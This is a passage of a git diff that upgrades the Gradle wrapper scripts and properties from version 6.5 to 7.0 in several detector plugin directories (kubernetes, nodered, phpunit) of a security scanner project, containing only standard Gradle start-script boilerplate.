@rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/kubernetes/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/kubernetes/gradlew b/google/detectors/exposedui/kubernetes/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/kubernetes/gradlew +++ b/google/detectors/exposedui/kubernetes/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/kubernetes/gradlew.bat b/google/detectors/exposedui/kubernetes/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/kubernetes/gradlew.bat +++ b/google/detectors/exposedui/kubernetes/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/exposedui/nodered/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/nodered/gradle/wrapper/gradle-wrapper.properties index 8f9797cb5..d04736436 100644 --- a/google/detectors/exposedui/nodered/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/nodered/gradle/wrapper/gradle-wrapper.properties @@ -1,6 +1,6 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip networkTimeout=10000 validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME diff --git a/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.jar b/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.properties b/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/exposedui/phpunit/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/exposedui/phpunit/gradlew b/google/detectors/exposedui/phpunit/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/exposedui/phpunit/gradlew +++ b/google/detectors/exposedui/phpunit/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/exposedui/phpunit/gradlew.bat b/google/detectors/exposedui/phpunit/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/exposedui/phpunit/gradlew.bat +++ b/google/detectors/exposedui/phpunit/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe 